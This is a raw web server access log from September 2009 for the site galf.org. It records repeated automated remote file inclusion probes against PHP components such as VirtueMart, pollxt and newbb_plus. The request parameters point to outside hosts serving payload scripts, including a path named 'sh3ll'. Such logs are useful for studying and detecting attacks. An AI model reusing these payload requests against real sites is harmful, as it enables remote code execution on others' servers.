219.85.63.226 - - [07/Sep/2009:06:28:14 -0700] "GET /logs/access_090713.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:17 -0700] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:40 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:40 -0700] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:49 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:49 -0700] "GET /logs/access_090713.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:53 -0700] "GET /logs/access_090504.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:28:54 -0700] "GET /logs/access.log%20%20////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:56 -0700] "GET /logs/access_090504.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:28:57 -0700] "GET /logs/access_090302.log%20%20////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.38.188.164 - - [07/Sep/2009:06:28:57 -0700] "GET /logs/access.log%20%20////modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:58 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:58 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:28:58 -0700] "GET /logs/access_090727.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:06:31:06 -0700] "GET /?sIncPath=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:06:31:06 -0700] "GET /logs//?sIncPath=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 200 4804 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:06:32:05 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:06:32:05 -0700] "GET /logs//components/errors.php?error=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:06:32:05 -0700] "GET /components/errors.php?error=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:06:32:08 -0700] "GET /components/errors.php?error=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:06:32:08 -0700] "GET /logs/access.log%20%20//components/errors.php?error=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:06:32:09 -0700] "GET /logs//components/errors.php?error=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:32:43 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.85.63.226 - - [07/Sep/2009:06:32:43 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.85.63.226 - - [07/Sep/2009:06:32:43 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:32:47 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:32:48 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:32:48 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
200.54.148.66 - - [07/Sep/2009:06:33:27 -0700] "GET /logs/access_090330.log%20%20//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:33:27 -0700] "GET /logs//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:33:27 -0700] "GET /?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:33:28 -0700] "GET /logs/access_090330.log//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:33:28 -0700] "GET /logs//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:33:28 -0700] "GET /?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:34:14 -0700] "GET /logs/access_090323.log//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:16 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:16 -0700] "GET /logs/access_090608.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:26 -0700] "GET /logs/access_090525.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:28 -0700] "GET /logs/access_090727.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:34 -0700] "GET /logs/access_090601.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:41 -0700] "GET /logs/access_090713.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:47 -0700] "GET /logs/access_090622.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:48 -0700] "GET /logs/access_090427.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:34:51 -0700] "GET /logs/access_090504.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:35:18 -0700] "GET /logs/access_090511.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:35:27 -0700] "GET /logs/access_090518.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:35:32 -0700] "GET /logs/access_090413.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:35:32 -0700] "GET /logs/access_090831.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:35:32 -0700] "GET /logs/access_090420.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.219.198.195 - - [07/Sep/2009:06:35:43 -0700] "GET /logs/access_090803.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
219.85.63.226 - - [07/Sep/2009:06:36:03 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.85.63.226 - - [07/Sep/2009:06:36:03 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
219.85.63.226 - - [07/Sep/2009:06:36:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
200.54.148.66 - - [07/Sep/2009:06:36:09 -0700] "GET /logs/access_090406.log//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:36:09 -0700] "GET /?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:36:09 -0700] "GET /logs//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:36:46 -0700] "GET /logs//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:37:08 -0700] "GET /logs/access_090518.log//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.91 - - [07/Sep/2009:06:37:10 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.54.148.66 - - [07/Sep/2009:06:37:12 -0700] "GET /logs/access_090518.log//?option=com_custompages&cpage=http://g0tr00t.pr.vc/sh3ll/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.102.21.168 - - [07/Sep/2009:06:38:39 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://33lo.pl/111??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
75.102.21.168 - - [07/Sep/2009:06:38:40 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://33lo.pl/111??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
75.102.21.168 - - [07/Sep/2009:06:38:40 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://33lo.pl/111??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "galf.org"
218.219.198.195 - - [07/Sep/2009:06:40:32 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.219.198.195 - - [07/Sep/2009:06:40:32 -0700] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.219.198.195 - - [07/Sep/2009:06:40:32 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [07/Sep/2009:06:41:56 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.27.203.107 - - [07/Sep/2009:06:41:56 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
218.27.203.107 - - [07/Sep/2009:06:41:56 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
174.37.136.126 - - [07/Sep/2009:06:42:35 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.37.136.126 - - [07/Sep/2009:06:42:35 -0700] "GET /logs/access_090302.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.37.136.126 - - [07/Sep/2009:06:42:35 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.37.136.126 - - [07/Sep/2009:06:42:42 -0700] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.37.136.126 - - [07/Sep/2009:06:43:27 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.37.136.126 - - [07/Sep/2009:06:43:27 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.37.136.126 - - [07/Sep/2009:06:43:27 -0700] "GET /logs/access_090302.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.37.136.126 - - [07/Sep/2009:06:43:32 -0700] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.239.157.203 - - [07/Sep/2009:06:47:14 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.239.157.203 - - [07/Sep/2009:06:47:14 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.239.157.203 - - [07/Sep/2009:06:47:15 -0700] "GET /logs/access_090601.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:06:49:58 -0700] "GET /logs/access_090706.log%20%20//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:06:49:58 -0700] "GET /logs//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:06:49:58 -0700] "GET /toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.17.77 - - [07/Sep/2009:06:50:02 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/v6-i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
91.121.17.77 - - [07/Sep/2009:06:50:03 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/v6-i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
67.212.175.154 - - [07/Sep/2009:06:50:03 -0700] "GET /toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.17.77 - - [07/Sep/2009:06:50:03 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/v6-i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "galf.org"
67.212.175.154 - - [07/Sep/2009:06:50:03 -0700] "GET /logs//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:06:50:03 -0700] "GET /logs/access_090706.log%20%20//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:06:50:04 -0700] "GET /logs/access_090622.log%20%20//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.212.175.154 - - [07/Sep/2009:06:50:07 -0700] "GET /logs/access_090622.log%20%20//toolbar.php?dirDepth=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:06:50:27 -0700] "GET ///////?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 200 1053 "-" "Mozilla/5.0" "galf.org"
87.118.116.55 - - [07/Sep/2009:06:50:27 -0700] "GET /logs/access.log%20%20////////?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.118.116.55 - - [07/Sep/2009:06:50:27 -0700] "GET /logs////////?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:50:39 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:50:39 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:50:39 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:50:51 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:50:51 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
211.189.18.73 - - [07/Sep/2009:06:50:51 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
87.118.116.55 - - [07/Sep/2009:06:51:08 -0700] "GET ///////?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 200 1053 "-" "Mozilla/5.0" "www.galf.org"
87.118.116.55 - - [07/Sep/2009:06:51:08 -0700] "GET /logs////////?mosConfig_absolute_path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 200 4810 "-" "Mozilla/5.0" "www.galf.org"
